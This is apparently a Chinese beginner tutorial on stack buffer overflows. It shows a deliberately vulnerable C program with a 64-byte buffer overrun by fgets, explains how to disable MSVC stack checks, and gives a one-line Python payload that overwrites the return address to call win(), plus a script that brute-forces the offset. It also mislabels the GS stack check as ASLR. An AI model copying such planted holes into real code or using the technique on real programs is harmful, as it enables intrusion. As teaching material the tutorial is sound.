目录
- 栈溢出控制返回值
- 什么是栈溢出漏洞?
- 例子程序
栈溢出控制返回值
什么是栈溢出漏洞?
- 在栈上开一个数组
buf[64]
void func() {char buf[64];fgets(buf, sizeof(buf) + 100, stdin); // 读取比 buf 大得多的数据,人为制造溢出}
- 就是scanf、gets()、fgets()函数接收了超过buf[64]的字符串,导致返回值地址被覆盖掉了
- 返回值地址一般是:ebp+4
例子程序
我编写了一个pwn的helloworld程序,用来演示
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <string.h>// 目标函数:溢出后希望执行的代码
void win() {printf("[+] Pwned!\n"); fflush(stdout);// 可以在这里执行任意操作,例如弹出计算器// 执行到这里就算赢了
}// 漏洞函数:使用不安全的 scanf
void vulnerable() {char buf[64]; // 局部缓冲区printf("[*] Address of win: 0x%p\n", win);printf("[*] Buffer address: 0x%p\n", buf);printf("[>] Enter your payload: ");fflush(stdout);// scanf("%s", buf); // 无长度限制 → 栈溢出:如果win函数的地址有0的话无法利用// 替换原来的 scanf("%s", buf);fgets(buf, sizeof(buf) + 100, stdin); // 读取比 buf 大得多的数据,人为制造溢出printf("[+] You entered: %s\n", buf);
}int main() {vulnerable();return 0;
}
msvc编译器默认开启了栈保护ASLR,导致我们无法溢出成功,入门一般先关闭编译器的栈保护
对于这个程序,我们还需要关闭编译器的栈保护GS,这样生成的.exe才能溢出成功
关闭方法: 右键项目->属性(alt+enter)->c++->代码生成->安全检查->选择禁用安全检查-》应用
这样编译出来的main.exe就没有栈保护ASLR 了(查看详细的编译输出日志,确实少了GS参数)
payload
python -c "import sys; sys.stdout.buffer.write(b'A'*68 + b'\x40\x10\x8e\x00' + b'\n')" | ctf_demo0001.exe我们执行了上面的payload就可以看到成功调用了win函数,输出了pwn
注意点:
1.机器是小端机,所以地址倒过来排列的
2. 要关闭编译器的栈保护后,再编译生成ctr_demo0001.exe
3. 这里的python -c "import sys; sys.stdout.buffer.write(b'A'*68 + b'\x40\x10\x8e\x00' + b'\n')" | ctf_demo0001.exe
这里的68初学者如果不成功可以用一个脚本遍历一下看看是多少
import subprocesswin_addr = b'\x40\x10\xe1\x00' # 别忘了修改为win的地址,每台电脑可能不一样
for offset in range(60, 201, 4):payload = b'A' * offset + win_addr + b'\n'p = subprocess.Popen(['ctf_demo0001.exe'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)out, err = p.communicate(payload)print(f'尝试 {offset}')print(f'输出 {out}')if b'Pwned!' in out:print(f'成功!偏移 = {offset}')break
else:print('未找到偏移')